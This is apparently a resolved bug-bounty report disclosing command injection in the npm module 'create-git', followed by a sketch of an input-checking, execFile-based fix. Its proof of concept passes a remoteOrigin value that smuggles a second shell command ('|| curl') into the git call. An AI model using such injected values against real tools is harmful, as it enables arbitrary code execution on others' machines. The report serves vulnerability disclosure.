[create-git] RCE via insecure command formatting
Team Summary
Official summary from Node.js third-party modules
The `create-git` npm module was vulnerable to `command injection`: some `user supplied inputs` were concatenated, without proper checks, into an `exec()` call, which made it possible to execute `arbitrary commands` in addition to the `git` command the tool uses. The PoC resulted in:

```js
// poc.js
const createGit = require('create-git')

createGit({
  ignoreExisting: true,
  initialCommitMessage: 'test',
  remoteOrigin: 'http://evil.com || curl "http://localhost/RCE"',
  ignoreTemplates: ['Node.gitignore']
})
```

The vulnerability has been fixed by checking the input data and by replacing the `exec()` occurrences with `safe functions` for executing commands.
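The two parts of the fix described in the summary (check the input, run `git` without a shell), sketched as an added example that is not the module's actual patch. The names `vulnerableCommand`, `isSafeRemote`, `buildRemoteAddArgs` and `addRemote` are hypothetical, and the `git remote add origin` command line is an assumption about how `remoteOrigin` is used.

```javascript
// Added example; helper names are hypothetical, not create-git's own code.
const { execFile } = require('child_process')

// Vulnerable pattern (assumed shape): the value is concatenated into a command
// string, so the shell spawned by exec() interprets operators such as `||`.
function vulnerableCommand(remote) {
  return 'git remote add origin ' + remote
}

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'ssh:', 'git:'])
const SCP_LIKE = /^[\w.-]+@[\w.-]+:[\w.\/~-]+$/ // e.g. git@host:user/repo.git

// Input check: allowlist the shape of a remote instead of blocklisting characters.
function isSafeRemote(remote) {
  if (typeof remote !== 'string' || remote.length === 0) return false
  if (remote.startsWith('-')) return false // git would parse it as an option
  if (/[\s\x00-\x1f]/.test(remote)) return false // no whitespace or control chars
  try {
    return ALLOWED_PROTOCOLS.has(new URL(remote).protocol)
  } catch {
    return SCP_LIKE.test(remote) // not a URL: accept only user@host:path
  }
}

// Builds an argument vector; each element reaches git as exactly one argument.
function buildRemoteAddArgs(remote) {
  if (!isSafeRemote(remote)) throw new TypeError('rejected remoteOrigin value')
  return ['remote', 'add', 'origin', remote]
}

// execFile passes the argument vector straight to git; no shell parses the value.
function addRemote(remote, cwd, callback) {
  execFile('git', buildRemoteAddArgs(remote), { cwd }, callback)
}
```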
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Code Injection